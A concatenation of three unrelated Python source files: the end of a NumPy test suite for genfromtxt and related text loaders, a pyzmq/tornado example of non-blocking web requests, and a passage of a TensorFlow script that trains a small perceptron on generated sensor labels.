dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
"Test the conversion to datetime64."
converter = {'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = TextIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x : float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x : float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(converters={2 : strip_per, 3 : strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = TextIO('q1,2\nq3,4')
cnv = lambda s:float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0:cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0:bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper warning."
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(TextIO(data),
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(TextIO(data),
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0:"N/A", 'b':" ", 2:"???"},
filling_values={0:0, 'b':0, 2:-999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x:"(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(TextIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(TextIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), **kwargs)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values= -999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b'testNonetherestofthedata')
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b' testNonetherestofthedata')
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file object
wanted = np.arange(6).reshape((2, 3))
if sys.version_info[0] >= 3:
# python 3k is known to fail for '\r'
linesep = ('\n', '\r\n')
else:
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
f, name = mkstemp()
# We can't use NamedTemporaryFile on windows, because we cannot
# reopen the file.
try:
os.write(f, asbytes(data))
assert_array_equal(np.genfromtxt(name), wanted)
finally:
os.close(f)
os.unlink(name)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokenness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
gc.collect()
n_before = len(gc.get_objects())
np.load(f)
n_after = len(gc.get_objects())
assert_equal(n_before, n_after)
if __name__ == "__main__":
run_module_suite()
|
asyncweb.py
|
"""Async web request example with tornado.
Requests to localhost:8888 will be relayed via 0MQ to a slow responder,
who will take 1-5 seconds to respond. The tornado app will remain responsive
during this time, and when the worker replies, the web request will finish.
A '.' is printed every 100ms to demonstrate that the zmq request is not blocking
the event loop.
"""
import sys
import random
import threading
import time
import zmq
from zmq.eventloop import ioloop, zmqstream
"""
ioloop.install() must be called prior to instantiating *any* tornado objects,
and ideally before importing anything from tornado, just to be safe.
install() sets the singleton instance of tornado.ioloop.IOLoop with zmq's
IOLoop. If this is not done properly, multiple IOLoop instances may be
created, which will have the effect of some subset of handlers never being
called, because only one loop will be running.
"""
ioloop.install()
import tornado
from tornado import web
def slow_responder():
"""thread for slowly responding to replies."""
ctx = zmq.Context.instance()
socket = ctx.socket(zmq.REP)
socket.linger = 0
socket.bind('tcp://127.0.0.1:5555')
i=0
while True:
msg = socket.recv()
print "\nworker received %r\n" % msg
time.sleep(random.randint(1,5))
socket.send(msg + " to you too, #%i" % i)
i+=1
def dot():
"""callback for showing that IOLoop is still responsive while we wait"""
sys.stdout.write('.')
sys.stdout.flush()
class TestHandler(web.RequestHandler):
@web.asynchronous
def get(self):
ctx = zmq.Context.instance()
s = ctx.socket(zmq.REQ)
s.connect('tcp://127.0.0.1:5555')
# send request to worker
s.send('hello')
self.stream = zmqstream.ZMQStream(s)
self.stream.on_recv(self.handle_reply)
def handle_reply(self, msg):
# finish web request with worker's reply
reply = msg[0]
print "\nfinishing with %r\n" % reply,
self.stream.close()
self.write(reply)
self.finish()
def main():
worker = threading.Thread(target=slow_responder)
worker.daemon=True
worker.start()
application = web.Application([(r"/", TestHandler)])
beat = ioloop.PeriodicCallback(dot, 100)
beat.start()
application.listen(8888)
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print ' Interrupted'
if __name__ == "__main__":
main()
|
train_model.py
|
# coding: utf-8
# MultiPerceptron
# Training fed through a queue
# Records the number of training steps
# Training data comes from a generator instead of CSV files
# Changed to a 3x11x4 NN model
# Added a softmax score output
import os
_FILE_DIR=os.path.abspath(os.path.dirname(__file__))
import time
import tensorflow as tf
import threading
from sklearn.utils import shuffle
import sys
sys.path.append(_FILE_DIR+'/..')
from generator.labelgenerator import LabelGenerator
import numpy as np
import logging
# Logging configuration
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] time:%(created).8f pid:%(process)d pn:%(processName)-10s tid:%(thread)d tn:%(threadName)-10s fn:%(funcName)-10s %(message)s',
)
tf.reset_default_graph()
MODEL_DIR=_FILE_DIR+"/model"
SUMMARY_LOG_DIR=_FILE_DIR+"/log"
if not os.path.exists(MODEL_DIR):
os.makedirs(MODEL_DIR)
N_NODES_HL1 = 11
DATA_COLS = 3 # number of sensors: left45, front, right45
N_CLASSES = 4 # number of prediction classes: stop, left, forward, right
BATCH_SIZE = 100 # keep the batch size around 10-100
CHUNK_SIZE = BATCH_SIZE*1 # number of records held in the queue
N_THREADS = 1 # number of data-generation threads; training is heavier than mini-batch creation, so one thread is enough
TARGET_STEP = 10000 # number of training steps
TEST_NUM = 10000 # number of test records
generator = LabelGenerator()
def generate_random_train_data(n_rows):
    '''
    Generate random sensor values and the corresponding label data.
    args:
        n_rows: number of rows to generate
    return:
        batch_data: sensor values
        batch_target: label data
    '''
csvdata=[]
    # Generate random integer sensor values within 2 m (0-200 cm)
sensors = np.random.randint(0,200,[n_rows,DATA_COLS])
for i in range(n_rows):
generator_result = generator.get_label(sensors[i])
csvrow = np.hstack((sensors[i],generator_result))
csvdata.append(csvrow)
csvdata = np.array(csvdata)
batch_data = csvdata[0:n_rows,0:DATA_COLS]
batch_target = csvdata[0:n_rows,DATA_COLS:]
return batch_data, batch_target
def load_and_enqueue(sess):
while True:
try:
batch_data, batch_target = generate_random_train_data(BATCH_SIZE)
sess.run(enqueue_op, feed_dict={placeholder_input_data:batch_data, placeholder_input_target:batch_target})
#logging.debug("running")
except tf.errors.CancelledError as e:
break
print("finished enqueueing")
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
with tf.variable_scope("input"):
placeholder_input_data = tf.placeholder('float', [None, DATA_COLS], name='input_data') # for load_and_enqueue. use dequeue_op:0 for prediction
placeholder_input_target = tf.placeholder('float', name='input_target') # for load_and_enqueue. use dequeue_op:1 for prediction
placeholder_batch_size = tf.placeholder(tf.int32, name='batch_size') # need feed_dict in training sess.run(). don't need for prediction.
with tf.variable_scope("step"):
    placeholder_step = tf.placeholder(tf.int32, name='input_step') # placeholder for feeding the step value
    variable_step = tf.Variable(initial_value=0, name="step") # variable that stores the step count
step_op = variable_step.assign(placeholder_step)
with tf.variable_scope("queue"):
queue = tf.FIFOQueue(
capacity=CHUNK_SIZE, # enqueue size
dtypes=['float', 'float'],
shapes=[[DATA_COLS], [N_CLASSES]],
name='FIFOQueue'
)
# Enqueue and dequeue operations
enqueue_op = queue.enqueue_many([placeholder_input_data, placeholder_input_target], name='enqueue_op')
    # dequeue_many retrieves BATCH_SIZE records at a time; the count comes from a placeholder so a variable number of records can be dequeued for test data and at prediction time.
dequeue_input_data, dequeue_input_target = queue.dequeue_many(placeholder_batch_size, name='dequeue_op') # instead of data/target placeholder
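    # At prediction time, inputs are fed directly to 'queue/dequeue_op:0' / 'queue/dequeue_op:1'
    # instead of going through the queue (see the accuracy.eval() calls near the end of training).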
with tf.variable_scope('neural_network_model'):
    # Hidden layer definition
hidden_layer_1 = {'weights':tf.Variable(weight_variable([DATA_COLS, N_NODES_HL1])),
'biases':tf.Variable(bias_variable([N_NODES_HL1]))}
    # Output layer definition
output_layer = {'weights':tf.Variable(weight_variable([N_NODES_HL1, N_CLASSES])),
'biases':tf.Variable(bias_variable([N_CLASSES])),}
    # Hidden layer computation
layer_1 = tf.add(tf.matmul(dequeue_input_data,hidden_layer_1['weights']), hidden_layer_1['biases'])
layer_1 = tf.nn.relu(layer_1)
    # Prediction (output layer computation)
prediction = tf.add(tf.matmul(layer_1,output_layer['weights']), output_layer['biases'], name='output_y')
    # Softmax score
score = tf.nn.softmax(prediction, name='score')
with tf.variable_scope('loss'):
losses = tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=dequeue_input_target)
loss_op = tf.reduce_mean(losses, name='cost')
tf.summary.scalar('loss', loss_op)
with tf.variable_scope('accuracy'):
correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(dequeue_input_target, 1))
accuracy = tf.reduce_mean(tf.cast(correct, 'float'), name='accuracy')
tf.summary.scalar('accuracy', accuracy)
summary_op = tf.summary.merge_all()
